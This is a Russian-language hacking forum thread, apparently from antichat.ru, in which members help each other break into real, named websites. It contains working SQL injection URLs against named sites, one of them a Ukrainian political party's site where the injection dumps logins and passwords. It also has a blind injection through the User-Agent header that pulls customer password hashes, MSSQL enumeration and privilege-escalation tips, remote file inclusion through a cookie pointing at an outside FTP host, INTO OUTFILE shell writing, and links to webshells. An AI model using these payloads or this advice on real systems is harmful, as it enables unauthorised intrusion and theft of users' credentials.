чет не получается... начал перечитывать статью по символьному перебору https://forum.antichat.ru/showpost.php?p=407227&postcount=3 но понял, что вроде как не в ту сторону копаю...
Может распишешь запрос к выводу, а я по аналогии разберусь с этим примером...

pelligrim в ту сторону копаеш, только твой вывод это правильно отображение странички (т.е. правильное выполнение запроса), а тут смотри выводим версию бд

http://www.enext.ua/index.php?node=0+and+substring(version(),1,1)=5 => 1 символ равняеться 5
http://www.enext.ua/index.php?node=0+and+ascii(lower(substring(version (),2,1)))=0x2E => так опряделяем точку
http://www.enext.ua/index.php?node=0+and+substring(version(),3,1)=0 => тут ноль
http://www.enext.ua/index.php?node=0+and+ascii(lower(substring(version (),4,1)))=0x2E
http://www.enext.ua/index.php?node=0+and+substring(version(),5,1)=7 => ну и тут 2 семерки
http://www.enext.ua/index.php?node=0+and+substring(version(),6,1)=7

в итоге получаем версию мускула - 5.0.77

проблема такая,выполняю sql запрос в пхпадмине,пишет: Запрос выполнен успешно,смотрю файл пустой,пробовал писать произволные символы.Успеха нет.
Пишу в папку tmp ,пишеться,читаю админом файл пустой..Юзер рут

Shadrin
Мб на запрос посмотрим, или сами догадаемся?
Уверен, что файл пустой, или всё-же его нет?

проблема такая,выполняю sql запрос в пхпадмине,пишет: Запрос выполнен успешно,смотрю файл пустой,пробовал писать произволные символы.Успеха нет.
Пишу в папку tmp ,пишеться,читаю админом файл пустой..Юзер рут


пустой - это ты видишь в phpmyadmine, после load_file() результат "NULL"?

Запрос был вот (https://forum.antichat.ru/showpost.php?p=1579990&postcount=9290)
нет он писал именно файл с размером 0, в папке на запись был Index Of ,поэтому все было видно, проблема решилось следующим образом,я просто изменил таблицу и базу куда слал запрос,и все записалось)
UpЕсть админка через которую можно заливать пхп код,только переименовывает в жпг,и вижу исходник шелла, и так же есть локальный инклуд,если возможно то как залить шелл?

Возможно.инклюдь картинку.

залил r57,частично отображается,куски кода на все страницу где кнопки где их нету,с99 кодированный вообще не открывается, пихаю <?php phpinfo();?> ,переименовываю в жпг,заливаю,открываю в ие исходник есть,через иклюд вообще кода нету.:confused:

залил r57,частично отображается,куски кода на все страницу где кнопки где их нету,с99 кодированный вообще не открывается, пихаю <?php phpinfo();?> ,переименовываю в жпг,заливаю,открываю в ие исходник есть,через иклюд вообще кода нету.:confused:
Может chroot там какой извращенский для пхп...

Shadrin пхп неисполняеться, ищи другой способ

<?php phpinfo();?> ,переименовываю в жпг,заливаю,открываю в ие исходник есть,через иклюд вообще кода нету.:confused:
а что ты хотел в жпг картинку засунуть пшп код , и чтоб он выполнялся?

я вообще хотел залить шел,и спросил что можно сделать

Скорее всего как сказали выше пехопе не исполняется для твоих файлов. Вообще сайт написан на чем?

на php, стоит относильно известная СМS

Я конечно, ламер, но можно вопрос?
Если сайт не юзает XSS, то можно сташить куки через сниффер?
Или это невозможно?

Я конечно, ламер, но можно вопрос?
Если сайт не юзает XSS, то можно сташить куки через сниффер?
Или это невозможно?
извени, но нет :(

сайт не юзает XSS
что то новое

Я конечно, ламер, но можно вопрос?
Если сайт не юзает XSS, то можно сташить куки через сниффер?
Или это невозможно?
можно, но для этого нужо какимто образом заставить жертву ввести скрипт в адресную строку.

http://armatula.ru/index.php?id=73'
Раскручиваемо?

раскручиваемо:
http://armatula.ru/index.php?id=-73'+union+select+version(),2,3+--+

есть сайт http://danielbrowninc.com/story_preview.php
вылазит ошибка /www/danielbrowninc.com/includes/functions.inc

иду на http://danielbrowninc.com/includes/ или на http://danielbrowninc.com/includes/functions.inc
вылазит 404 ошибка! как такое могет быть?

не! физически файл существуеть! я его через load_file читаю

Add: Пошел pelmeshk0 сканить

сайт может быть в папке html к примеру
/www/danielbrowninc.com/html/
поэтому доступа к папке инклудес нет из веба

насканил:все защищено .htaccess-ами
и их через лоад файл не прочитать ((((((((

придеться шонить другое искать

насканил:все защищено .htaccess-ами
и их через лоад файл не прочитать ((((((((

придеться шонить другое искать
Возможно просто в твоём functions.inc проверка, если инклюд > Выполняем.
Если не инклюд тупо.

header("HTTP/1.0 404 Not Found") or die();

Есть такой скрипт

<?php
session_start();

$template->set_filenames(array('head'=>"$template_path/header.html"));

$template->pparse('head');

?>


Реально череp параметры переопределить класс template, ну и заставить скрипт делать что-то свое?

Есть такой скрипт

<?php
session_start();

$template->set_filenames(array('head'=>"$template_path/header.html"));

$template->pparse('head');

?>


Реально череp параметры переопределить класс template, ну и заставить скрипт делать что-то свое?
нет

Есть страница со слепой скулей.
При вводе ?id=1+AND+(SUBSTRING(version(),1,1 ))>33..127
всё работает нормально.
При вводе ?id=1+AND+(SUBSTRING((select+login+from+users+limi t+1,1),1,1 ))>33..127
Тишина.(таблица и поля 100% называться так)
Для проверки ввёл ?id=1+AND+(SUBSTRING((select+select+version()),1,1 ))>33..127
Всё вывелось.

Т.е. в коде видимо идёт замена 'select' на '', для пробы попробовал selselectct, тоже не помогло(видимо проверка в цикле), можно тут что-то сделать?

можно тут что-то сделать?
Дать линк

Дать линк
сайт недоступен из инета :(

При вводе ?id=1+AND+(SUBSTRING((select+login.users+limit(1,1 )),1,1 ))>33..127
Тишина.(таблица и поля 100% называться так)

WTF?

Такая ситуация.
Есть сайт одной украинской партии.
Есть скуля по нему
http://www.prp.org.ua/index.php?mid=10&action=news_full&news_id=-1229%20union%20select%201,login,3,password,5,6,7,8 ,9,10,11,12,13%20FROM%20private%20--
есть админка http://www.prp.org.ua/phpmyadmin
есть ещё конфиг к ней, но я не знаю что с ней делать
http://www.prp.org.ua/phpmyadmin/scripts/setup.php
Вот ещё сдесь директ админ http://www.prp.org.ua/config
помогите...пароли не подходят, и что можно со всем этим сделать

phpmyadmin это оболчка для работы с базами данных mysql, а не админка

а вход на главной ))

TELO, ты достаешь данные не из конфига MySQL / DirectAdmin'a.

TELO, ты достаешь данные не из конфига MySQL / DirectAdmin'a.
а можно подробнее?

а можно подробнее?
Т.е. ты достаешь данные из таблички пользователей сайта. А путь ты нашёл не к админке сайта, а к phpmyadmin'у и directadmin'y, соответственно пароль не подходит. Авторизация, как было сказано выше, на главной странице. Авторизируйся под логином и паролем admin.

Нашел инъекцию через юзер агента(Tampler data рулит).Как подставлять запросы?
Пробовал and+select+version() и тд-непрет.
Сайтик www.prozis.es
После названия браузера ставим кавычку.
1064 - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '(Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6 (' at line 1

replace into robots (user_agent, last_access, num_access) values ('Mozilla/5.0' (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6 (.NET CLR 3.5.30729)',now(),0)

',(more1row_or_duplicate_column_names),'1'),('M

',(more1row_or_duplicate_column_names),'1'),('M
Вот смотрите, дорогие друзья, вот так НЕНАДО помогать новичкам

l1ght ты правда думаешь, что он понял? :)

2Fed123

Почитай про blind-скл-инъекии статьи Elect'a и Qwazar'a на этом форуме.
Раскрутить можно:
User-Agent: Mozilla/5.0',if((locate(substr((select customers_password from customers limit 1),1),'0123456789abcdef')),now(),(select 1 union select 2)), 0) #
и т.д.

Такая ситуация.
Есть сайт одной украинской партии.
Есть скуля по нему
http://www.prp.org.ua/index.php?mid=10&action=news_full&news_id=-1229%20union%20select%201,login,3,password,5,6,7,8 ,9,10,11,12,13%20FROM%20private%20--
есть админка http://www.prp.org.ua/phpmyadmin
есть ещё конфиг к ней, но я не знаю что с ней делать
http://www.prp.org.ua/phpmyadmin/scripts/setup.php
Вот ещё сдесь директ админ http://www.prp.org.ua/config
помогите...пароли не подходят, и что можно со всем этим сделать
http://milw0rm.com/exploits/8921

Насколько я понимаю, то к этому:
http://www.prp.org.ua/phpmyadmin/scripts/setup.php
этот сплойт:
http://milw0rm.com/exploits/8921
не прокатит, т.к. не подходит конфигурация пма.

Где-то видел тут на античате тему про, то как делать эксплоит скрипта типа

<? $a($b); ?>


он юзается примерно так: test.php?a=phpinfo&b=32
вот и подумал может с классами также можно извратиться.

P.S. Это к сообщению про вот этот скрипт
<?
$template->set_filenames(array('head'=>"$template_path/header.html"));
$template->pparse('head');
?>

есть какие нибудь базы по хешам желательный на пхп или exe

есть какие нибудь базы по хешам желательный на пхп или exe
hashcracking.info

Привет есть стандартная инъекция в MySQL вида:
site.ru/index.php?id=1+union+select+1,2,3,4,5--+
Возможно ли сделать UPDATE или INSERT в базу?

Привет есть стандартная инъекция в MySQL вида:
site.ru/index.php?id=1+union+select+1,2,3,4,5--+
Возможно ли сделать UPDATE или INSERT в базу?
нет

Возможно ли сделать прокси из сервера на котором есть шелл?
Если не рутить его (выдел в шелле можно порты вроде какието открывать.)

Возможно ли сделать прокси из сервера на котором есть шелл?
Если не рутить его (выдел в шелле можно порты вроде какието открывать.)
https://forum.antichat.ru/thread93318.html

Есть скрипт, который проверяет является ли папкой (ф-цией is_dir) значение skin в куках. Если да, то идёт инклюд: if(is_dir($_COOKIE['skin']))
include($_COOKIE['skin'].'/template.php');Можно ли реализовать LFI произвольного файла, а не только template.php?. Если же заюзать NULL - байт, то инклюдится ничего не будет, ибо is_dir возвратит false.

Где-то видел тут на античате тему про, то как делать эксплоит скрипта типа

<? $a($b); ?>


он юзается примерно так: test.php?a=phpinfo&b=32
вот и подумал может с классами также можно извратиться.

P.S. Это к сообщению про вот этот скрипт
<?
$template->set_filenames(array('head'=>"$template_path/header.html"));
$template->pparse('head');
?>
Это можно замутить если тока register_globals = on
в php.ini

Есть скрипт, который проверяет является ли папкой (ф-цией is_dir) значение skin в куках. Если да, то идёт инклюд: if(is_dir($_COOKIE['skin']))
include($_COOKIE['skin'].'/template.php');Можно ли реализовать LFI произвольного файла, а не только template.php?. Если же заюзать NULL - байт, то инклюдится ничего не будет, ибо is_dir возвратит false.
Там RFI
Cookie: skin=ftp://vasya:tapochkin@ftp.narod.ru/

ну а на фтпшнике соответственно файл template.php
+ "Начиная с PHP 5.0.0, эта функция также может быть использована с некоторыми упаковщиками url."
==
Если интересует именно LFI произвольного файла, то врятли

Это можно замутить если тока register_globals = on
в php.ini Покажи как. Вот как раз для случая с $template->set_filenames(array('head'=>"$template_path/header.html"));

Покажи как. Вот как раз для случая с $template->set_filenames(array('head'=>"$template_path/header.html"));
file.php?template=../index.php%0D

Ну а я вообщем то говорил про первый пример, так что строго не судите :)

file.php?template=../index.php%0D

Ну а я вообщем то говорил про первый пример, так что строго не судите :)
Не будет работать, ибо глобальные массивы будут регистрироваться вначале скрипта, а после будет идти инклюд конфига какого-то, и $template заменится.

jokester, спасибо. Это мой код, т.е. исходников я палить не хотел, ибо там названия классов / ф-ция выдает двиг. В исходнике движка есть еще префикс dirname(__FILE__), т.е. папка тек. файла. Значит никак :( Спасибо еще раз... Значит можно добиться только расскрытия...

file.php?template=../index.php%0D

Ну а я вообщем то говорил про первый пример, так что строго не судите :)

С первым то все понятно, работает как часы :)

А вот этот скрипт он именно такой короткий и есть

$template->set_filenames(array('head'=>"$template_path/header.html"));


Просто он написан для того чтобы его инклудить в файл в котором класс template задан уже, но по глупости авторов к этому скрипту есть прямой доступ.

Есть сервер MySQL
И сервер на котором стоит сайт, он может выводить/вводить данные из/в БД

1)Как можно на сервер с сайтом залить шелл через MySQL
2)Может можно прописать что-то в БД чтоб сайт вывел шелл читая это из БД

PS заливки файлов нет на сайте :(

Если file_priv = Y и есть путь к корню, то
SELECT '<?php echo "shellcode"; ?>' FROM table_name INTO OUTFILE '/full/path/to/dir/shell.php'

Если file_priv = Y и есть путь к корню, то
SELECT '<?php echo "shellcode"; ?>' FROM table_name INTO OUTFILE '/full/path/to/dir/shell.php'

Если даже и так то он зальёт на сервер с БД
Я обращаюсь к БД напрямую а не через инъекцию

Byrger, а разве есть разница, что со скули, что напрямую? о_0

у меня следующий вопрос. Есть скуля, версия БД =4. Там нет informatio_shcema. Следовательно поиск имен таблиц и т.д. превращается в полный геморр(лично для меня это так)). Можно ли автоматизировать этот процесс? Кроме использования сипта?

Byrger, а разве есть разница, что со скули, что напрямую? о_0

Нуу... понимаешь что база и сайт на разных машинах.

у меня следующий вопрос. Есть скуля, версия БД =4. Там нет informatio_shcema. Следовательно поиск имен таблиц и т.д. превращается в полный геморр(лично для меня это так)). Можно ли автоматизировать этот процесс? Кроме использования сипта?
Ручной брут, либо скрипты юзай...

Единственное что я думаю можно сделать в моём случае

1)ЧТоб сайт прочитал из БД шелл и заинклудил его к себе
2)Чтоб сайт отрыл шелл который находится на сервере с MySQL

На сайте, при вводе символа ' в строку с логеном, выскакевает следующее сообщение:
1064 - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''''' at line 1

select * from customers where customers_email_address='''

[TEP STOP]

Стандартные пути раскрутки - не приводят ни к чиму. Как быть?
Строка урла при это выглядет так:

saita.net/login.php?action=process&osCsid=8951e68c4h7e10jg70cdgghqc3

кто падскажет?

1 (http://forum.antichat.ru/showpost.php?p=1553538&postcount=9162),2 (http://forum.antichat.ru/thread35207.html),3 (http://forum.antichat.ru/threadnav119047-1-10.html)

Т.е. ты достаешь данные из таблички пользователей сайта. А путь ты нашёл не к админке сайта, а к phpmyadmin'у и directadmin'y, соответственно пароль не подходит. Авторизация, как было сказано выше, на главной странице. Авторизируйся под логином и паролем admin.
да эт ясно, не дурак...вопрос в том как достать данные для админки

у меня следующий вопрос. Есть скуля, версия БД =4. Там нет informatio_shcema. Следовательно поиск имен таблиц и т.д. превращается в полный геморр(лично для меня это так)). Можно ли автоматизировать этот процесс? Кроме использования сипта?


https://forum.antichat.ru/thread148915.html

Набрёл тут на недописанную страничку на одном сайте, но никак немогу раскрутить ничего кроме версии...
что можно ещё сделать?
http://www.forema.ru/test.php?id=26+and+substring(version(),1,1)=5

Набрёл тут на недописанную страничку на одном сайте, но никак немогу раскрутить ничего кроме версии...
что можно ещё сделать?
http://www.forema.ru/test.php?id=26+and+substring(version(),1,1)=5
Например,kuhni@zvm12:kuhni:5.0.77
Юзер:бд:версия

Заюзал скулю. Движок самописный, админку не нашел. Прав на исполнение команд не хватает. Вручную перебирать все через top 1 - ну очень долго и геморно, поэтому имею пару вопрос.
1. Друзья, что можно сделать с mssql скулей, пользователь не sa. Может ли хватить прав для заливки файла в директорию или сайта или на это тоже не хватит прав(простите, не знаю...)
2. Подскажите нормальный дампер через скул для mssql, все что нашел - либо удалено, либо бито...

Когда перебирал базы(select db_name(n)) наткнулся на очень вкусные вещи, но когда пытался получить название их колонок, меня просто перекидало на изначальную страницу(дефолтную, где заюзал скул), а скуля просто отображалась в строке поиска. Может ли это говорить о том, что не хватает прав?
Просто у меня возникла такая идея: Если у моего пользователя хватит прав, то можно посмотреть и эту таблицу, но, из-за того что текущая база данных другая, то через INFORMATION_SCHEMA подобрать таблицы и поля - не удастся. Прав или натупил?
3. Можно ли попробовать подключиться к этой базе используя запрос вида(приблизительно)
select top 1 (имя колонки) from (имя таблицы) where db_name('имя базы')--
Или в ms sql с эти строго и ничего не получится? Если возможно, но запрос другой - подкорректируйте пожалуйста, я только учусь)))

1. Друзья, что можно сделать с mssql скулей, пользователь не sa. Может ли хватить прав для заливки файла в директорию или сайта или на это тоже не хватит прав(простите, не знаю...)
Добиться повышения привилегий с использованием брута пароля sa через OPENROWSET (в MSSQL 2005 отключено по умолчанию). В этом поможет инструмент sqlninja.
2. Подскажите нормальный дампер через скул для mssql, все что нашел - либо удалено, либо бито...
Pangolin, PRIAMOS, SFX-SQLi
Когда перебирал базы(select db_name(n)) наткнулся на очень вкусные вещи, но когда пытался получить название их колонок, меня просто перекидало на изначальную страницу(дефолтную, где заюзал скул)
возможно ты использовал неправильный синтаксис при указании базы данных, должно быть:
SELECT * FROM [db]..[table]
Если у моего пользователя хватит прав, то можно посмотреть и эту таблицу, но, из-за того что текущая база данных другая, то через INFORMATION_SCHEMA подобрать таблицы и поля - не удастся.
Можно получить названия таблиц из других баз данных, используя оператор USE для их выбора (если конечно прав хватит):
;USE db; SELECT name FROM sysobjects WHERE xtype = 'U';
;USE db; SELECT name FROM syscolumns WHERE id =(SELECT id FROM sysobjects WHERE name = 'users')

Например,kuhni@zvm12:kuhni:5.0.77
Юзер:бд:версия
Както негусто...
Может ещё что-то можно вытянуть?

http://justparty.ru/p.mailing/

Вписываем в поля "Имя", "Фамилия"

<script>alert()</script>

Что с этим можно сделать?

2zyat
почитайте статьи про XSS

']Добиться повышения привилегий с использованием брута пароля sa через OPENROWSET (в MSSQL 2005 отключено по умолчанию). В этом поможет инструмент sqlninja.

Pangolin, PRIAMOS, SFX-SQLi

возможно ты использовал неправильный синтаксис при указании базы данных, должно быть:
SELECT * FROM [db]..[table]

Можно получить названия таблиц из других баз данных, используя оператор USE для их выбора (если конечно прав хватит):
;USE db; SELECT name FROM sysobjects WHERE xtype = 'U';
;USE db; SELECT name FROM syscolumns WHERE id =(SELECT id FROM sysobjects WHERE name = 'users')
Огромное спасибо!
Все прокатило, только использовал без use а через:
database..sysobjects
database..syscolumns

Сейчас стала проблема в том, что не перебираются колонки.
SELECT name FROM syscolumns WHERE id =(SELECT id FROM sysobjects WHERE name = 'users')

Я дописал

SELECT name FROM syscolumns WHERE id =(SELECT id FROM sysobjects WHERE name = 'users') AND name IN NOT ('userid')
В ответ получаю:

Incorrect syntax near the keyword 'NOT'


userid - первая колонка в таблице users

Так-же не получилось вывести данные даже с этого поля userid
Запрос имел вид:
SELECT TOP 1 userid from [database]..[users]

Ответ

Operand type clash: uniqueidentifier is incompatible with tinyint


Если убрать кавычки то ответ меняется на:

Incorrect syntax near 'users'

Попробовал загнать "users" в char - не получилось.
просто для меня это загадка, которую ну никак не получается отгадать....Единственное что все-таки приходит в голову, это - не хватает прав. Хотя, если хватило на чтение database..sysobjects и database..syscolumns, то должно хватить прав и database.users...

попробуй в hex закодировать, в твоём случае users будет 0x7573657273

SELECT name FROM syscolumns WHERE id =(SELECT id FROM sysobjects WHERE name = 'users') AND name IN NOT ('userid')
В ответ получаю:


надо писать не IN NOT
а NOT IN

2 min7 бред, это mssql

Отписал в пм
min7, во-первых, users это имя таблицы, а не строка, во-вторых 0x... в MSSQL работать не будет (нужны дополнительные конструкции на T-SQL)

Огромное всем спасибо!
После того как загнал в char userid, он начал просто отображаться.

Conversion failed when converting the varchar value 'userid' to data type int.

$text=$_POST['text'];
$tr=$_POST['tr'];
$tr_text=$_POST['tr_text'];
if (empty($text)){echo"<div class=cont1>Введите ключевое слово!<br/></div><div class=menu><a href=\"search.php\">Назад</a></div>";
include "footer.php";
exit;}
if($tr_text==1){include_once "trans.php";
$text=eng_to_rus($text);}

//$text=strtolower($text);

if($tr==1){
$arr=mysql_query("select uid,site_name,link,info,cat from `users` where info like '%$text%' ;");
}

Возможно ли тут произвести SQL inj ?
Меня просто вот это смущает :(
select uid,site_name,link,info,cat from `users` where info like '%$text%' ;

Возможно ли тут произвести SQL inj ?
Меня просто вот это смущает :(
select uid,site_name,link,info,cat from `users` where info like '%$text%' ;
Ну просто в поле tr_text вводи 0 в tr вводим 1, а в text нашу скулю...

Ну просто в поле tr_text вводи 0 в tr вводим 1, а в text нашу скулю...
А как с LIKE быть?
Пытаюсь подставит ' не выводит ни какой ошибки, т.е. производится поиск ковычки в БД.
Пытался так

'union+select+1--

и т.д.
Чёт вообще мозг отказывается работать :mad:

пости в $_POST['text'] - %
и про $_POST['tr'] не забудь так как без него запрос не выполнится.

$text=$_POST['text'];
$tr=$_POST['tr'];
$tr_text=$_POST['tr_text'];
if (empty($text)){echo"<div class=cont1>Введите ключевое слово!<br/></div><div class=menu><a href=\"search.php\">Назад</a></div>";
include "footer.php";
exit;}
if($tr_text==1){include_once "trans.php";
$text=eng_to_rus($text);}

//$text=strtolower($text);

if($tr==1){
$arr=mysql_query("select uid,site_name,link,info,cat from `users` where info like '%$text%' ;");
}

Возможно ли тут произвести SQL inj ?
Меня просто вот это смущает :(
select uid,site_name,link,info,cat from `users` where info like '%$text%' ;
.php?tr=1&text=%' and info = -1 union select 1,2,3,4,5--+

ЗЫ l1ght, я знаю что постом) есть плагины которые позволяют из строки браузера отправлять постом

Привет, почти повторяюсь. Растолкую поточнее

Есть 2 сервера (2 разные машины)
1 с сайтом
2 с БД

Есть доступ к БД
А сайт использует эту БД
Задача залить шелл на сайт через БД

Если допустим в БД заношу <? eval(echo 1;); ?> то на сайте так и выводит, не обрабатывая
На сайте знаю полный путь.

Очень извеняюсь что не по теме, но я хочу поучиться искать уязвимости во всяких кмс и движках. Нужен совет какой двиг начать ковырять?) знаю что звучит глупо, но надеюсь что ктото посоветует=)

Привет, почти повторяюсь. Растолкую поточнее

Есть 2 сервера (2 разные машины)
1 с сайтом
2 с БД

Есть доступ к БД
А сайт использует эту БД
Задача залить шелл на сайт через БД

Если допустим в БД заношу <? eval(echo 1;); ?> то на сайте так и выводит, не обрабатывая
На сайте знаю полный путь.
Скорей всего там на подобие этого

$sql=mysql_query("select * from `adad`");
echo "$sql";

Т.е. получается вот так
echo "<?php eval()?>";
Попробуй поиграй с ковычками...
PS: я не эксперт, могу ошибится

если там так как описал SeNaP,то пробуй:

".eval('echo 123;')."

Очень извеняюсь что не по теме, но я хочу поучиться искать уязвимости во всяких кмс и движках. Нужен совет какой двиг начать ковырять?) знаю что звучит глупо, но надеюсь что ктото посоветует=)
http://ru.wikipedia.org/wiki/%D0%A1%D0%BF%D0%B8%D1%81%D0%BE%D0%BA_CMS
cmslist.ru

Byrger хотя вряд ли там такое :
echo "<?php eval()?>";
может быть ,по моему только камикадзе будет так выводить текст ,который с вероятностью 70%(дело вкуса) будет содержать ".
Скорей всего там стоит htmlspecialchars(); или тому подобные функции.
Возьми ка найди в сорсе страницы ту часть где ты постил:
<? eval(echo 1;) ?>
если там будет ,что то типа:
&lt;? eval(echo 1;) ?&gt;
залей холодной водой.

Byrger хотя вряд ли там такое :
echo "<?php eval()?>";
может быть ,по моему только камикадзе будет так выводить текст ,который с вероятностью 70%(дело вкуса) будет содержать ".
Скорей всего там стоит htmlspecialchars(); или тому подобные функции.
Возьми ка найди в сорсе страницы ту часть где ты постил:
<? eval(echo 1;) ?>
если там будет ,что то типа:
&lt;? eval(echo 1;) ?&gt;
залей холодной водой.

Нет там htmlspecialchars

Столкнулся с проблемой - не удается получить числовое значение строки.
Из-за того что значение строки целое число(например, 1234567), то используя обыкновенную конструкцию SELECT TOP 1 password FROM - вытянуть ничего не получилось. В ответ дефолтная страница без скуля.
Нашел, что это решается методом добавление чего-либо к числовым данным, перед этим переведенных в integer. Имеем такую конструкцию.
SELECT TOP 1 convert(int, password%2b'test') FROM
где в итоге, наш пароль должет отобразится как "1234567 test"

Увы, заюзать - не получилось. В ответ получаю ошибку
Error converting data type varchar to float.
База mssql 2005.
Друзья, очень прошу подсказать как с этим бороться! Спасибо!

Ты уверен что это Mssql а не Access? И покажи полностью как скулю вводишь.

Нет там htmlspecialchars


Попробовал конструкции типа
.phpinfo(). (выводит как есть)
".phpinfo()." (экранирует \")
'.phpinfo().' (экранирует \')

Попробовал конструкции типа
.phpinfo(). (выводит как есть)
".phpinfo()." (экранирует \")
'.phpinfo().' (экранирует \')
htmlspecialchars экранирует, но не в таком виде ;)

htmlspecialchars экранирует, но не в таком виде ;)
Если бы был htmlspecialchars то он бы и <? экранировал.
Тут mysql_real_escape_string похоже

Если бы был htmlspecialchars то он бы и <? экранировал.
Тут mysql_real_escape_string похоже
или magic_quotes = On ;)
htmlspecialchars нетак экранирует.
htmlspecialchars в XSS хорошо, он просто "нехорошие" символы в HTML понятные переводит.
Вот к примеру скрипт:

<?PHP
$text = htmlspecialchars($_GET['c']);
echo $text;
?>

Задал в ?c=<script>alert();</script>
Вывелось <script>alert();</script>
Но не выполнилось, потому что htmlspecialchars, экранировал всё это в &lt;script&gt;alert();&lt;/script&gt;, а браузер понимает это всё, и переводит в <script>alert();</script>
Так что " он переводит в &quot;
htmlspecialchars() (http://php.net/manual/en/function.htmlspecialchars.php)
Так что он к ' неподстовляет слэш.

Так что или magic_quotes on либо
mysql_real_escape_string

или magic_quotes = On ;)
htmlspecialchars нетак экранирует.
htmlspecialchars в XSS хорошо, он просто "нехорошие" символы в HTML понятные переводит.
Вот к примеру скрипт:

<?PHP
$text = htmlspecialchars($_GET['c']);
echo $text;
?>

Задал в ?c=<script>alert();</script>
Вывелось <script>alert();</script>
Но не выполнилось, потому что htmlspecialchars, экранировал всё это в , а браузер понимает это всё, и переводит в <script>alert();</script>
Так что " он переводит в &quot;
htmlspecialchars() (http://php.net/manual/en/function.htmlspecialchars.php)
Так что он к ' неподстовляет слэш.

Так что или magic_quotes on либо
mysql_real_escape_string

Если бы он так экронировал то в HTML было бы &quot;...
Вот кусок кода который выводится в HTML
<td><? phpinfo(); ?></td>

Я не вижу чтоб тут htmlspecialchars() поработало

echo (htmlspecialchars ("<td><? phpinfo(); ?></td>"));

выведет

&lt;td&gt;&lt;? phpinfo(); ?&gt;&lt;/td&gt;

Очень даже работает

echo (htmlspecialchars ("<td><? phpinfo(); ?></td>"));

выведет

&lt;td&gt;&lt;? phpinfo(); ?&gt;&lt;/td&gt;

Очень даже работает
Вы что все сговорили чтоли или не читаете вообще о чём тема то идёт?
Я говорю нету там экранировки html символов, толкьо ' и " экранируется...
Может ещё как-то можно заставить вополнять код?

Обноружил что сайт пользуется шаблонизатором так как в некоторых местах видел {name}

Если mysql_real_escape_string() или addslashes(), то у тебя не чего неполучится :(
MySQL какую кодировку использует?

Если mysql_real_escape_string() или addslashes(), то у тебя не чего неполучится :(
MySQL какую кодировку использует?
character_set_client cp1251
character_set_connection cp1251
character_set_database cp1251
character_set_filesystem binary
character_set_results cp1251
character_set_server cp1251
character_set_system utf8
character_sets_dir /usr/share/mysql/charsets/
collation_connection cp1251_general_ci
collation_database cp1251_general_ci
collation_server cp1251_general_ci

Есть удаленный инклуд в ASP скрипте, когда пробую инклудить php файл, он не выполняется, ASP выполняется на ура.
Подскажите как залить шелл, и есть ли у кого нормальный ASP шелл?

Есть удаленный инклуд в ASP скрипте, когда пробую инклудить php файл, он не выполняется, ASP выполняется на ура.
Подскажите как залить шелл, и есть ли у кого нормальный ASP шелл?
Вот так вот тогда :)
Скачать файл Grasp.asp (http://dump.ru/file/3608550)

Как искать уязвимости на сложных сайтах?Допустим есть сайт-на нем нету заветной тройки(Xss,sql-inj,php inc).Сканил сайт на диры-ничего интересного.
Нехочу опускать руки)Ведь все можно взломать,или все таки нет

Как искать уязвимости на сложных сайтах?Допустим есть сайт-на нем нету заветной тройки(Xss,sql-inj,php inc).Сканил сайт на диры-ничего интересного.
Нехочу опускать руки)Ведь все можно взломать,или все таки нет
Через reverse-ip(взлом сайтов-соседей).

Непоможет,пробую фарма сайты.1-Они на выделенных серверах(большинство).2.Был один бажный сайтих на одном серве,через него залил шелл и обломился-такие сервы постоянно обновляются,то бишь эксплойты отпадают.
Но за ответ спасибо,действительно способ хороший.

Warning: mysql_connect() [function.mysql-connect]: Too many connections in /nfs/c01/h04/mnt/37108/domains/1ink.ru/html/index.php on line 49

Warning: mysql_select_db() [function.mysql-select-db]: Can't connect to local MySQL server through socket '/var/run/mysqld/mysqld.sock' (2) in /nfs/c01/h04/mnt/37108/domains/1ink.ru/html/index.php on line 50

Warning: mysql_select_db() [function.mysql-select-db]: A link to the server could not be established in /nfs/c01/h04/mnt/37108/domains/1ink.ru/html/index.php on line 50

Warning: mysql_real_escape_string() [function.mysql-real-escape-string]: Can't connect to local MySQL server through socket '/var/run/mysqld/mysqld.sock' (2) in /nfs/c01/h04/mnt/37108/domains/1ink.ru/html/index.php on line 51

Warning: mysql_real_escape_string() [function.mysql-real-escape-string]: A link to the server could not be established in /nfs/c01/h04/mnt/37108/domains/1ink.ru/html/index.php on line 51

Warning: mysql_query() [function.mysql-query]: Can't connect to local MySQL server through socket '/var/run/mysqld/mysqld.sock' (2) in /nfs/c01/h04/mnt/37108/domains/1ink.ru/html/index.php on line 51

Warning: mysql_query() [function.mysql-query]: A link to the server could not be established in /nfs/c01/h04/mnt/37108/domains/1ink.ru/html/index.php on line 51

Warning: mysql_fetch_assoc(): supplied argument is not a valid MySQL result resource in /nfs/c01/h04/mnt/37108/domains/1ink.ru/html/index.php on line 52


при заходе на сайт пишет такое что с этим можнно сднлать

Warning: mysql_connect() [function.mysql-connect]: Too many connections in /nfs/c01/h04/mnt/37108/domains/1ink.ru/html/index.php on line 49

Warning: mysql_select_db() [function.mysql-select-db]: Can't connect to local MySQL server through socket '/var/run/mysqld/mysqld.sock' (2) in /nfs/c01/h04/mnt/37108/domains/1ink.ru/html/index.php on line 50

Warning: mysql_select_db() [function.mysql-select-db]: A link to the server could not be established in /nfs/c01/h04/mnt/37108/domains/1ink.ru/html/index.php on line 50

Warning: mysql_real_escape_string() [function.mysql-real-escape-string]: Can't connect to local MySQL server through socket '/var/run/mysqld/mysqld.sock' (2) in /nfs/c01/h04/mnt/37108/domains/1ink.ru/html/index.php on line 51

Warning: mysql_real_escape_string() [function.mysql-real-escape-string]: A link to the server could not be established in /nfs/c01/h04/mnt/37108/domains/1ink.ru/html/index.php on line 51

Warning: mysql_query() [function.mysql-query]: Can't connect to local MySQL server through socket '/var/run/mysqld/mysqld.sock' (2) in /nfs/c01/h04/mnt/37108/domains/1ink.ru/html/index.php on line 51

Warning: mysql_query() [function.mysql-query]: A link to the server could not be established in /nfs/c01/h04/mnt/37108/domains/1ink.ru/html/index.php on line 51

Warning: mysql_fetch_assoc(): supplied argument is not a valid MySQL result resource in /nfs/c01/h04/mnt/37108/domains/1ink.ru/html/index.php on line 52


при заходе на сайт пишет такое что с этим можнно сднлать
Нету коннекта к БД, не че нельзя сделать

